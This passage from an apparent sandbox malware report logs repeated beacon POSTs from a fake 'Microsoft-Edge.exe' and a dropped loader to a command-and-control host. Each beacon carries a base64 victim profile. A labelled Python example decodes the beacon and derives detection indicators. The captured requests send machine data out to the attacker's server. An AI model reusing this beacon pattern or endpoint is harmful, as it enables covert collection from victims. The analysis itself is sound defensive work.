2024-09-27 15:42:55 UTC | 3382 | IN | Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.4 | 49844 | 172.67.187.100 | 443 | 7636 | C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:55 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
Connection: Keep-Alive
User-Agent: A WinHTTP Example Program/1.0
Content-Length: 0
Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:56 UTC | 630 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 15:42:56 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-powered-by: PHP/8.0.30
strict-transport-security: max-age=31536000;
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=km%2B8M3P5qbr37SeLx%2F8pNfGWoFmyRqVhVZGVXmtGe7es7Dia93HWGF4Xa3Llt%2BRnFrw3iaxmP7HrifF%2F9dGbHDCtokWusIVFNQBQ3Nirs4cp0%2BTch0zn6xMxRPZxsuUOfzl%2B%2F5AmZfbx"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c9c9b3efbdc43cd-EWR
2024-09-27 15:42:56 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
Data Ascii: 2
2024-09-27 15:42:56 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
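The POST in session 59 (repeated by both Microsoft-Edge.exe and the dropped loader in the sessions that follow) carries the victim profile as base64-encoded JSON in the `token` query parameter, with an empty body and the default User-Agent of Microsoft's WinHTTP sample code. The Python below is an added example, not part of the Joe Sandbox report and not the malware's own code: it parses the captured request from session 59 (embedded verbatim), decodes the token, and returns the fields an analyst would pivot on. The function names and indicator labels are the example's own.

```python
import base64
import json

# Token copied verbatim from the session 59 request above; split across
# string literals only for readability.
TOKEN = (
    "ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAog"
    "ICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIs"
    "CiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2Rl"
    "bCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhl"
    "IiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0="
)

# The request as captured in session 59 (headers copied from the report).
CAPTURED_REQUEST = (
    "POST /iloverussia.php?token=" + TOKEN + " HTTP/1.1\r\n"
    "Connection: Keep-Alive\r\n"
    "User-Agent: A WinHTTP Example Program/1.0\r\n"
    "Content-Length: 0\r\n"
    "Host: eijfrhegrtbrfcd.online\r\n"
    "\r\n"
)

# Default User-Agent from Microsoft's WinHTTP sample code. Shipping software
# almost never keeps it, so it is a weak but useful network indicator.
WINHTTP_SAMPLE_UA = "A WinHTTP Example Program/1.0"


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, path, query and headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    path, _, query = target.partition("?")
    return {"method": method, "path": path, "query": query,
            "version": version, "headers": headers}


def query_param(query, name):
    """Return a query value without '+'/'%' decoding: the client sends the
    base64 token raw, including its '=' padding, so unquote_plus would
    corrupt any '+' in it."""
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return value
    return None


def decode_token(token):
    """Base64-decode the token (repairing stripped padding) and parse JSON."""
    padded = token + "=" * (-len(token) % 4)
    return json.loads(base64.b64decode(padded).decode("utf-8"))


def decode_beacon(raw):
    """Decode one check-in request into host, victim profile and indicators."""
    req = parse_request(raw)
    token = query_param(req["query"], "token")
    profile = decode_token(token) if token else {}
    indicators = []
    if req["headers"].get("user-agent") == WINHTTP_SAMPLE_UA:
        indicators.append("winhttp-sample-user-agent")
    # A POST with no body that carries its payload in the query string is
    # unusual for legitimate clients and easy to key a rule on.
    if req["method"] == "POST" and req["headers"].get("content-length") == "0":
        indicators.append("empty-post-with-data-in-query")
    if profile.get("admin") == "true":
        indicators.append("reports-admin")
    return {"host": req["headers"].get("host"), "path": req["path"],
            "user_agent": req["headers"].get("user-agent"),
            "profile": profile, "indicators": indicators}


def token_matches_dropped_loader(profile, dropped_filename):
    """Correlate the beacon's campaign token with the numeric suffix of the
    dropped loader seen in the report (loader_<token>.exe)."""
    token = profile.get("token")
    stem = dropped_filename.rsplit(".", 1)[0]
    return bool(token) and stem.endswith("_" + token)


if __name__ == "__main__":
    result = decode_beacon(CAPTURED_REQUEST)
    print(json.dumps(result, indent=2))
    print("token matches dropped loader:",
          token_matches_dropped_loader(result["profile"], "loader_5879465914.exe"))
```

Decoding the token shows why the two processes send byte-identical requests: the profile (CPU count, RAM, OS version, processor string, the `filename` the sample runs under, an `admin` flag and the campaign `token` 5879465914) is collected once, and the same token reappears in the dropped file name loader_5879465914.exe, so the suffix can be used to tie disk artifacts to the beacon.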


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.4 | 49846 | 172.67.187.100 | 443 | 1748 | C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:56 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
Connection: Keep-Alive
User-Agent: A WinHTTP Example Program/1.0
Content-Length: 0
Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:57 UTC | 620 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 15:42:57 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-powered-by: PHP/8.0.30
strict-transport-security: max-age=31536000;
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XW5eF9bUSiGlj50hhCMu7PGjZfPBrsHYrbpperM4RLLfz2fQAmcdBdr9x5s9JsZJDhP4kvgsAIBlNjmvD%2BM9ytVpCMJy9NymFcU7SFR5PZhibmOdfjke2wJ5DPy2sEilH803S%2BeCQEmC"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c9c9b458e9841cf-EWR
2024-09-27 15:42:57 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
Data Ascii: 2
2024-09-27 15:42:57 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.2.4 | 49847 | 172.67.187.100 | 443 | 7636 | C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:57 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
Connection: Keep-Alive
User-Agent: A WinHTTP Example Program/1.0
Content-Length: 0
Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:57 UTC | 630 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 15:42:57 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-powered-by: PHP/8.0.30
strict-transport-security: max-age=31536000;
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mUSuSHk1VXcHRkRDyuLQ7B0UUK%2BNSSUBx4mOPib%2BHx3RK1gEnIvjMznj6GklIW%2F%2B6NLnzfPowJ8OSvD9GstNQ1rX0qzF81Avi2SvmN0d3Tm4WTWXPCISX%2FhwD%2Bcd4EpKSVu%2FSLDCpVn6"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c9c9b49cfcb7d00-EWR
2024-09-27 15:42:57 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
Data Ascii: 2
2024-09-27 15:42:57 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.2.4 | 49849 | 172.67.187.100 | 443 | 1748 | C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:58 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
Connection: Keep-Alive
User-Agent: A WinHTTP Example Program/1.0
Content-Length: 0
Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:58 UTC | 628 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 15:42:58 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-powered-by: PHP/8.0.30
strict-transport-security: max-age=31536000;
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SR1PQ%2FIPeQoHGmdeSv%2FTe1CJ59mRSyVD19zHAlep8KLNCBdBKO2xjrtuaVS04M3xYuE8DlMU1pa%2Fj7SIHEKAbfQSmd6blYseA9TTbhg%2B0FkBN%2BPqFuuW2%2Fm7pI0jl45PakpgpGcAcK7A"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c9c9b4e5aa5c448-EWR
2024-09-27 15:42:58 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
Data Ascii: 2
2024-09-27 15:42:58 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.2.4 | 49851 | 172.67.187.100 | 443 | 7636 | C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:59 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
Connection: Keep-Alive
User-Agent: A WinHTTP Example Program/1.0
Content-Length: 0
Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:59 UTC | 622 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 15:42:59 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-powered-by: PHP/8.0.30
strict-transport-security: max-age=31536000;
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HH3q6cd%2FeA3oiFDBV6seMD7jucHoBLed7TqvCb98UWyX9d2yXdwwa%2BceJjYnkUfiQ81iDD7WS3UhikHkYdjsNOvO5clmU88rPBA6ZooW4QNeT85NbCY1dDlcy7VDsM%2FHIevppq7T6NGC"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c9c9b536a2e1a0f-EWR
2024-09-27 15:42:59 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
Data Ascii: 2
2024-09-27 15:42:59 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
64 | 192.168.2.4 | 49852 | 172.67.187.100 | 443 | 1748 | C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:59 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
  Connection: Keep-Alive
  User-Agent: A WinHTTP Example Program/1.0
  Content-Length: 0
  Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:59 UTC | 620 | IN | HTTP/1.1 200 OK
  Date: Fri, 27 Sep 2024 15:42:59 GMT
  Content-Type: text/html; charset=utf-8
  Transfer-Encoding: chunked
  Connection: close
  x-powered-by: PHP/8.0.30
  strict-transport-security: max-age=31536000;
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ofPs2OoPCSuTh71LMXzCGE6cHAB3haCmToJgLjeLfzMd5f64EC7%2BWL3D68m91gyM30Ae5DWVXfiMS8p9tbKyrBKmE9pex2H7yJjHE4pbHsBYuYBtKhmib2pl91stUvKKpg7w%2BBO8GIBP"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8c9c9b546b8f8c65-EWR
2024-09-27 15:42:59 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
  Data Ascii: 2
2024-09-27 15:42:59 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
65 | 192.168.2.4 | 49854 | 172.67.187.100 | 443 | 1748 | C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:43:00 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
  Connection: Keep-Alive
  User-Agent: A WinHTTP Example Program/1.0
  Content-Length: 0
  Host: eijfrhegrtbrfcd.online
2024-09-27 15:43:01 UTC | 626 | IN | HTTP/1.1 200 OK
  Date: Fri, 27 Sep 2024 15:43:01 GMT
  Content-Type: text/html; charset=utf-8
  Transfer-Encoding: chunked
  Connection: close
  x-powered-by: PHP/8.0.30
  strict-transport-security: max-age=31536000;
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NTLuE6%2Br48TgeZDDHxl6lEyT17CDn1YYuz18ISEQGqeWoFyRvv4hAr5jB1M5If%2FILyGjl%2FDG6c2J8t5U8aAB5AQG8sTCQGx9xNuP4fBXwl%2B1TN9r3LMujO3cPwYVwpAhsNTjX9QJ%2Bw0j"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8c9c9b5e0e00176c-EWR
2024-09-27 15:43:01 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
  Data Ascii: 2
2024-09-27 15:43:01 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
66 | 192.168.2.4 | 49855 | 172.67.187.100 | 443 | 7636 | C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:43:00 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
  Connection: Keep-Alive
  User-Agent: A WinHTTP Example Program/1.0
  Content-Length: 0
  Host: eijfrhegrtbrfcd.online
2024-09-27 15:43:01 UTC | 626 | IN | HTTP/1.1 200 OK
  Date: Fri, 27 Sep 2024 15:43:01 GMT
  Content-Type: text/html; charset=utf-8
  Transfer-Encoding: chunked
  Connection: close
  x-powered-by: PHP/8.0.30
  strict-transport-security: max-age=31536000;
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VN5bMyZqnZFrkD9McMBQEKCm3wALoUnmv2uClHQXG7i4ABS0kQ1bxU%2F3L4LmxmqUvbrT%2FKnIHQfqFm5e9OBS44x4wK86rl2ik5qEFUbDM%2Bs1KB9tTaF3ZOGGam2Cp7vt3KPdsernf%2F%2Fy"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8c9c9b5f3f626a59-EWR
2024-09-27 15:43:01 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
  Data Ascii: 2
2024-09-27 15:43:01 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
67 | 192.168.2.4 | 49857 | 172.67.187.100 | 443 | 1748 | C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:43:01 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
  Connection: Keep-Alive
  User-Agent: A WinHTTP Example Program/1.0
  Content-Length: 0
  Host: eijfrhegrtbrfcd.online
2024-09-27 15:43:02 UTC | 622 | IN | HTTP/1.1 200 OK
  Date: Fri, 27 Sep 2024 15:43:02 GMT
  Content-Type: text/html; charset=utf-8
  Transfer-Encoding: chunked
  Connection: close
  x-powered-by: PHP/8.0.30
  strict-transport-security: max-age=31536000;
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=th9qGDgv5moFGoUnhoW0ns%2BCxSeOJH5iukcHSzGFDZL7UNe3o3jUSx91f%2FyL90hc8BLhltW%2BchhF8rynvZKH8W61ZvZgdYOOlaHNpWxhKrfL65Vf4nsOgVR51jQjot97UrhO0o9fdf0m"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8c9c9b6579d24308-EWR
2024-09-27 15:43:02 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
  Data Ascii: 2
2024-09-27 15:43:02 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
68 | 192.168.2.4 | 49859 | 172.67.187.100 | 443 | 7636 | C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:43:02 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
  Connection: Keep-Alive
  User-Agent: A WinHTTP Example Program/1.0
  Content-Length: 0
  Host: eijfrhegrtbrfcd.online
2024-09-27 15:43:02 UTC | 622 | IN | HTTP/1.1 200 OK
  Date: Fri, 27 Sep 2024 15:43:02 GMT
  Content-Type: text/html; charset=utf-8
  Transfer-Encoding: chunked
  Connection: close
  x-powered-by: PHP/8.0.30
  strict-transport-security: max-age=31536000;
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ANWgBTK%2B0ZVo8htKMCMMlIyN9rvQQTChrKUwQVJM70uzUF%2BCOY5qKhAygOYvvDCnyTF7JNMSexzHJV2RDMbhpndW8cAHxzDkPUIIrzCcCVxWL1Fx7so9nY1oJviOHohBrRFO0%2FHQpuha"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8c9c9b66a9ab8c93-EWR
